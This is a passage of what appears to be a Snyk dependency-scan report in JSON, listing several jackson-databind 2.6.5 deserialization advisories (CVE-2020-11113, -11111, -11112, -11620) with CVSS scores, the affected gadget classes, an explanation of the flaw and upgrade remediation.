"https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2670", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-11113", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:47.400473Z" - } - ], - "cvssSources": [ - { - "type": 
"primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:21.749219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.400473Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11113" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9vvp-fxw6-jcxr" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T08:36:41.369827Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.400473Z", - "socialTrendAlert": false, - "severityWithCritical": 
"high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2664", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": 
"high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.628835Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11111" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-v3xw-c963-f5hc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:28:18.821103Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.145935Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", - "title": "GItHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2666", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - 
"baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:03.656527Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11112" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-58pp-9c76-5625" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:29:29.728517Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.113524Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2682", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", 
- "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.162608Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92404", - "probability": "0.04399", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11620" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h4rc-386g-6m85" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:55:38.169333Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:23Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:23Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:17.073265Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2680", - "title": "GitHub Issues" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": 
"high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.933985Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
